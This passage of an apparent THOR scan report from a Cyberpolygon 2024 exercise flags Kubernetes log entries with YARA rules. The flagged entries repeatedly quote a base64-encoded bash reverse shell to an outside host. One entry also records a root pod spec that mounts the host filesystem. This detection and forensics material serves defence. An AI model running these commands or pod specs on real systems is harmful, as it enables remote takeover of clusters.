\"cwd\"[...]ain_applied"],"input":{},"k8s":{"runtime":{"node_name":"k8s-node01","time":"2024-09-03T14:17:20.402208808Z","process_exec":{"process":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","pid":164760,"cwd":"/home/utils","start_time":"2024-09-03T14:17:20.402209123Z","docker":"11c3efd882aa61732eccba3bdd9d6db","parent_exec_id":"azhzLW5vZGUwMTo5NzA4NzE4NzUyMzc1MDc6MTY0NzQ2","tid":164760,"uid":0,"binary":"/bin/sh","pod":{"name":"mlops-metrics","workload_kind":"Pod","container":{"id":"cri-o://11c3efd882aa6173
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 10
Sep 10 18:39:20 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"moI_uJEBNKI3r7qcaSsw","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:22.150Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzMwMzI5MjQ6MTY0Nzgw\", \"pid\":164780, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/usr/bin/base64\", \"arguments\":\"-d\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:20.403096678Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://11c3efd882aa61732eccba3bdd9d6db3cc4128c22036953fd9609d43620c277b\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"pid\":8}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"11c3efd882aa61732eccba3bdd9d6db\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzIxNDUwMDY6MTY0NzYw\", \"tid\":164780}, \"parent\":{\"exec_[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]bdd9d6db3cc4128c22036953fd9609d43620c277b","name":"mlops-metrics","pid":8,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4NzE5MzMwMzI5MjQ6MTY0Nzgw"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","pid":164760,"cwd":"/home/utils","start_time":"2024-09-03T14:17:20.402209123Z","docker":"11c3efd882
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 11
Sep 10 18:39:20 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"bII_uJEBNKI3r7qcaSsv","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:22.150Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzMwNTIzMzE6MTY0Nzgx\", \"pid\":164781, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/bash\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:20.403116085Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://11c3efd882aa61732eccba3bdd9d6db3cc4128c22036953fd9609d43620c277b\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"pid\":9}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"11c3efd882aa61732eccba3bdd9d6db\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzIxNDUwMDY6MTY0NzYw\", \"tid\":164781}, \"parent\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4N[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]rics","pid":9,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4NzE5MzMwNTIzMzE6MTY0Nzgx"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","pid":164760,"cwd":"/home/utils","start_time":"2024-09-03T14:17:20.402209123Z","docker":"11c3efd882aa61732eccba3bdd9d6db","parent_exec_id":"azhzLW5vZGUwMTo5NzA
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 12
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"rYI-uJEBNKI3r7qc8xbx","_score":1,"_source":{"@timestamp":"2024-09-03T14:16:49.946Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"9d73066b-0f58-4778-8e79-7f199f2e21e2\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods?fieldManager=kubectl-client-side-apply\\u0026fieldValidation=Strict\",\"verb\":\"create\",\"user\":{\"username\":\"system:serviceaccount:prod:prod-pod-creator\",\"uid\":\"09efc0da-119d-4977-bfa3-a2036547d714\",\"groups\":[\"system:serviceaccounts\",\"system:serviceaccounts:prod\",\"system:authenticated\"],\"extra\":{\"authentication.kubernetes.io/pod-name\":[\"mercury-mlflow-6f9d898884-ddtt9\"],\"authentication.kubernetes.io/pod-uid\":[\"dbd80eda-95e5-4b05-86e0-b649bf8733ba\"]}},\"sourceIPs\":[\"10.244.85.228\"],\"userAgent\":\"kubec[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...]am/utils\",\"args\":[\"sh\",\"-c\",\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"],\"resources\":{},\"volumeMounts\":[{\"name\":\[...]bels\\\":{\\\"app\\\":\\\"mlops-metrics\\\"},\\\"name\\\":\\\"mlops-metrics\\\",\\\"namespace\\\":\\\"prod\\\"},\\\"spec\\\":{\\\"containers\\\":[{\\\"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\\"name\\\":\\\"mlops-metrics\\\",\\\"securityContext\\\":{\\\"runAsUser\\\":0},\\\"volumeMounts\\\":[{\\\"mountPath\\\":\\\"/host\\\",\\\"name\\\":\\\"hostvolume\\\"}]}],\\\"volumes\\\":[{\\\"hostPath\\\":{\\\"path\\\":\\\"/\\\",\\\"type\\\":\\\"Directory\\\"},\\\"name\\\":\\\"hostvolume\\\"}]}}\\n\"},\"managedFields\":[{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersio
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Notices
Notice 1
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
Notice 2
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
Notice 3
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
Notice 4
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
Notice 5
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
Notice 6
Sep 10 18:47:10 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Report
MESSAGE:
Thor Scan finished
END_TIME:
Tue Sep 10 18:47:10 2024
ALERTS:
0
WARNINGS:
12
NOTICES:
5
ERRORS:
0